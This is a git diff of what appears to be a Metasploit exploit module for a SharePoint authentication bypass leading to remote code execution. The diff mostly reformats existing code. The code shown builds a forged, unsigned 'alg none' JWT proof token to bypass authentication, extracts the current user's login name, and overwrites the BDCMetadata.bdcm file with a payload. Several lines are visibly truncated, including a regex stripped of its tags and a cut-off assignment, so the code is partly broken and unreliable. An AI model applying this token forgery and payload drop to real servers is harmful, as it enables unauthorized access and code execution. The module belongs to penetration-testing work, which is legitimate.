diff --git a/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb b/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb index 117c38beb822..97aff34c2d80 100644 --- a/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb @@ -78,6 +78,7 @@ def initialize(info = {}) OptString.new('TARGETURI', [ true, 'The URL of the SharePoint application', '/' ]) ]) end + def resolve_target_hostname res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '_api', 'web'), @@ -128,19 +129,16 @@ def gen_endpoint_hash(url) end def gen_app_proof_token - - jwt_token1 = "{\"iss\":\"00000003-0000-0ff1-ce00-000000000000\",\"aud\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\",\"nbf\":\"1673410334\",\"exp\":\"1725093890\",\"nameid\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\", \"ver\":\"hashedprooftoken\",\"endpointurl\": \"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\": 1, \"isloopback\": \"true\"}" - jwt_token2 = { - :iss => "00000003-0000-0ff1-ce00-000000000000", - :aud => "00000003-0000-0ff1-ce00-000000000000@#{@realm}", - :nbf => "1673410334", - :exp => "1725093890", - :nameid => "00000003-0000-0ff1-ce00-000000000000@#{@realm}", - :ver => "hashedprooftoken", - :endpointurl => "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=", - :endpointurlLength => 1, - :isloopback => "true", + iss: '00000003-0000-0ff1-ce00-000000000000', + aud: "00000003-0000-0ff1-ce00-000000000000@#{@realm}", + nbf: '1673410334', + exp: '1725093890', + nameid: "00000003-0000-0ff1-ce00-000000000000@#{@realm}", + ver: 'hashedprooftoken', + endpointurl: 'qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=', + endpointurlLength: 1, + isloopback: 'true' }.to_json # Spacing doesn't matter in JSON yet using jwt_token2 causes a failure unless these spaces are added @@ -151,7 +149,6 @@ def gen_app_proof_token b64_token = Rex::Text.encode_base64(jwt_token2) "eyJhbGciOiAibm9uZSJ9.#{b64_token}.YWFh" - end def send_get_request(url) @@ -177,6 +174,7 @@ def get_current_user if res&.code != 200 raise SharepointInvalidResponseError, 'Failed to get current user' end + res.body end @@ -202,7 +200,7 @@ def do_auth_bypass user_info = get_current_user raise SharepointInvalidResponseError, 'Unable to identify the current user' if user_info.nil? - user_info =~ %r{.+?\|(.+)\|.+?<\/d:LoginName>} + user_info =~ %r{.+?\|(.+)\|.+?} raise SharepointInvalidResponseError, 'Unable to identify the LoginName of the current user' unless Regexp.last_match(1) username = Regexp.last_match(1) @@ -245,7 +243,6 @@ class #{class_name}: System.Web.Services.Protocols.HttpWebClientProtocol{ end def drop_and_execute_payload - bdcm_data = " '/BusinessDataMetadataCatalog/' } res_json = send_json_request('/_api/web/folders', body) @@ -366,7 +363,7 @@ def on_new_session(_session) end def store_bdcmetadata_loot(data) - file = store_loot('sharepoint.config', 'text/plain', rhost , data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it') + file = store_loot('sharepoint.config', 'text/plain', rhost, data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it') print_good("Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: #{file}") end